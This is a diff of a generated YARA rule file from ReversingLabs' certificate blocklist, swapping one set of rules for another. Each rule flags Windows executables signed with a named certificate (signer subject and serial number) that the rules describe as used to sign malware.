 		author = "ReversingLabs"
-		id = "a5ac5da6-0bb0-5327-ac3a-b53d2f103fe6"
+		id = "d0c4c6c0-d8e3-5efc-a87b-01d1f98a2c18"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11008-L11026"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0077b9c46ddd98a4929878ba4ba9476ed7fb1d7bf6e30c3ae0f950445d01e8f3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3922-L3938"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c41a4f9ccda54b9735313edf9042b831e6eaca149c089f74a823cee6719e1064"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14239,21 +38904,21 @@ rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIDER DEVELOPMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:db:c0:3c:a7:e6:ae:6d:b6" or pe.signatures [ i ] . serial == "db:c0:3c:a7:e6:ae:6d:b6" ) and 1600826873 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kimjac ApS" and pe.signatures [ i ] . serial == "4f:bc:aa:28:9b:a9:25:b4:e2:47:80:9b:6b:02:82:02" and 1588227220 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1F2E8Effbb08C7Dbcc7A7F2D835457B5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d8390528-ff27-514d-ab89-fd563a19ce3c"
+		id = "cf032593-e742-56d5-a579-3f38a31e2c0c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11028-L11044"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c1c50015db7f97b530819b40e2578463a6021bfff8e2582858a4c3fbd1a9b9bc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3940-L3956"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0b446641617d435c3d312592957e19c3d391b0149eafcf9ac2da51e8d9080eb4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14263,21 +38928,21 @@ rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures [ i ] . serial == "7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" and 1655424000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RTI, OOO" and pe.signatures [ i ] . serial == "1f:2e:8e:ff:bb:08:c7:db:cc:7a:7f:2d:83:54:57:b5" and 1581382360 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aeba4C39306Fdd022849867801645814 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "166949cf-dbff-5713-950e-46d1f3edc61f"
+		id = "f8cb78cf-541c-5038-b7af-83679c978ec8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11046-L11064"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9d361c91ed24b6c20a7b35957e26f208ce8e0a3d79c5a6fed6278acd826ccf49"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3958-L3976"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "82c149f1d8ef93a0df2035690c5cdca935236687bc36a35a84c3d6610eb6902c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14287,21 +38952,21 @@ rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAVAS INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures [ i ] . serial == "82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" ) and 1665100800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SK AI MAS GmbH" and ( pe.signatures [ i ] . serial == "00:ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" or pe.signatures [ i ] . serial == "ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" ) and 1579478400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_028D50Ae0C554B49148E82Db5B1C2699 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "681d233c-d5a2-5f25-bdb9-125149a291c4"
+		id = "76ccda8a-bdea-5db2-a3a4-11292bfb3c95"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11066-L11084"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fb7af8ec09da2fecaaaed8c7770966f11ef8a44a131553a9d1412387db2fb7ea"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3978-L3994"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e3cc0066cad56d78a3f42e092befa3b0855b2ed33c8465c5ecbb19fec082d35e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14311,21 +38976,21 @@ rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JESEN LESS d.o.o." and ( pe.signatures [ i ] . serial == "00:89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" or pe.signatures [ i ] . serial == "89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" ) and 1636588800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VAS CO PTY LTD" and pe.signatures [ i ] . serial == "02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" and 1579478400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_684F478C7259Dde0Cfe2260112Ca9846 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "508d9c00-c209-55b2-9a40-b62ff4d866c9"
+		id = "840af428-47e0-529e-9db9-8ab9c968f2e3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11086-L11102"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1ad4adf8b05a6cc065d289e6963480d37a92712a318744a30a16aad22380f238"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3996-L4012"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "59654ba1df27029a04ef3b1a1bb54f6c15b727f2013923a11a729752b8829743"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14335,21 +39000,21 @@ rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C.W.D. INSTAL LTD" and pe.signatures [ i ] . serial == "26:42:fe:86:5f:75:66:ce:31:23:a5:14:2c:20:70:94" and 1666310400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"IP EM\"" and pe.signatures [ i ] . serial == "68:4f:47:8c:72:59:dd:e0:cf:e2:26:01:12:ca:98:46" and 1584981648 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B7C32208A954A483Dd102E1Be094867 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e5cae614-eff1-5c3d-a7f6-c41b0a2c412e"
+		id = "d16e74d8-2c46-508b-b518-a542603ca726"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11104-L11120"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bc2df95ddf1ef3d5f83d14852e1cf6cbf4b71bfbe88fc97c2a4553e8581ddf47"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4014-L4030"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "49e2208a7d2b5684283c1dfc9856f864d16b50f951f58e0252c97419819a46ec"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14359,21 +39024,21 @@ rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karolina Klimowska" and pe.signatures [ i ] . serial == "4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" and 1660314070 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Win Sp Z O O" and pe.signatures [ i ] . serial == "0b:7c:32:20:8a:95:4a:48:3d:d1:02:e1:be:09:48:67" and 1583884800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3E72Daf2B9A4449E946009E5084A8E76 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bc37efaa-9ceb-5079-999f-b3d17c585b1c"
+		id = "aa7c6cbe-0794-59e3-a675-93beeccc9784"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11122-L11140"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2a0be6157e589705ad19756971bd865edad2d54760d03c2e6f47a461b402ad68"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4032-L4048"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f1a7bf6c18e0ebf8aef53feb7d7789ce87c96e00962c64e07a37d968702d2fa5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14383,21 +39048,21 @@ rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UPLagga Systems s.r.o." and ( pe.signatures [ i ] . serial == "00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" or pe.signatures [ i ] . serial == "92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" ) and 1598054400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Infoteh63" and pe.signatures [ i ] . serial == "3e:72:da:f2:b9:a4:44:9e:94:60:09:e5:08:4a:8e:76" and 1591787570 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_11Edd343E21C36Ac985555D85C16135F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "50d50330-4098-59dd-b2da-0714eefdfc66"
+		id = "219f709f-4e05-5d0e-97a4-eca1e65153a3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11142-L11160"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a42fec2e0e8d37948420f16907f39c3d502c535be98024d04a777dfbc633004d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4050-L4066"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "17feeed4be074a30572eb12fc81dc15d1b06f2d3f7b4b4fb4443391c62ac4d9b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14407,21 +39072,21 @@ rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ekitai Data Inc." and ( pe.signatures [ i ] . serial == "00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" or pe.signatures [ i ] . serial == "b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" ) and 1598313600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pribyl Handels GmbH" and pe.signatures [ i ] . serial == "11:ed:d3:43:e2:1c:36:ac:98:55:55:d8:5c:16:13:5f" and 1589925600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_093Fe63D1A5F68F14Ecaac871A03F7A3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8e533ebf-a124-53a9-8647-6f4b40aaa066"
+		id = "ce0b23fd-5f79-5b90-8d5c-2ff59ac39df6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11162-L11178"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "861691ce7bae4366f3b35d01c84bb0031b54653869f52eaccf20808b1b55d2af"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4068-L4084"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "333c58a9af2d94604b637ab0a7280b6688a89ff73e30a93a8daed040fab7f620"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14431,21 +39096,21 @@ rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLY BETTER s.r.o." and pe.signatures [ i ] . serial == "24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" and 1645142400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPECTACLE IMAGE LTD" and pe.signatures [ i ] . serial == "09:3f:e6:3d:1a:5f:68:f1:4e:ca:ac:87:1a:03:f7:a3" and 1562716800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bb26B7B6634D5Db548C437B5085B01C1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d188c65c-ee7b-586f-95f0-8de5b506c325"
+		id = "443a876a-dfd7-5a9e-bb15-a44a53363494"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11180-L11198"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ce489a4a2f07181d6fbf295f426deeaf51310e061bac2e56d65b37eeb397ff9a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4086-L4104"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "58d574b196f84416eb04000205cd8f4817618003f2948bb0eb7d951c282ef6ff"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14455,21 +39120,21 @@ rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade in Brasil s.r.o." and ( pe.signatures [ i ] . serial == "00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures [ i ] . serial == "88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"IT Mott\"" and ( pe.signatures [ i ] . serial == "00:bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" or pe.signatures [ i ] . serial == "bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" ) and 1591919307 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_29128A56E7B3Bfb230742591Ac8B4718 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fe3abe27-c8c8-54b8-b031-0546c9bfda90"
+		id = "b868d2f2-3852-57a3-be01-32cc16eb2ff7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11200-L11216"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "591846225d5faf3ee8f3102acaad066f0187219044077bbdaf32345613b00965"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4106-L4122"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5a89fec015e56ddddaed75be91a87288dcd27841937d26e3416187913c4f0b85"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14479,21 +39144,21 @@ rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OdyLab Inc" and pe.signatures [ i ] . serial == "53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" and 1654020559 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Programavimo paslaugos, MB" and pe.signatures [ i ] . serial == "29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" and 1590900909 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Bfbfdfef43608730Ee14779Ee3Ee2Cb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fe602ac3-fa34-5056-a2cc-5ae9de728559"
+		id = "fdc2f6a0-8fae-537e-812f-b0c292f76b1e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11218-L11234"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "30586a643b29f3c943b3f35bb1639c5b9fa48ecbd776775086e35af502aa4a7a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4124-L4140"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f8f233b78e9d3558b0cd7978e3c5fa32645a3bb706c6fdec7f1e4195cf513f10"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14503,21 +39168,21 @@ rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" and 1637971201 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CSTech Software Inc." and pe.signatures [ i ] . serial == "7b:fb:fd:fe:f4:36:08:73:0e:e1:47:79:ee:3e:e2:cb" and 1590537600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_62205361A758B00572D417Cba014F007 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d679238f-a697-5322-815c-9986c9d24032"
+		id = "85da8e0e-d791-5fed-b9ea-c681462651a6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11236-L11252"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "40b570b28e10ebd2a1ba515dc3fa45bdb5c0b76044e4dda7a6819976072a67a2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4142-L4158"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ebf28921c81191bcf6130baf6532122bb320cc916e38ab225f0acdcb57ea00f3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14527,21 +39192,21 @@ rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DILA d.o.o." and pe.signatures [ i ] . serial == "02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" and 1613865600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNITEKH-S, OOO" and pe.signatures [ i ] . serial == "62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" and 1590470683 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4B47D18Dbea57Abd1563Ddf89F87A6C2 : INFO FILE
 {
 	meta:
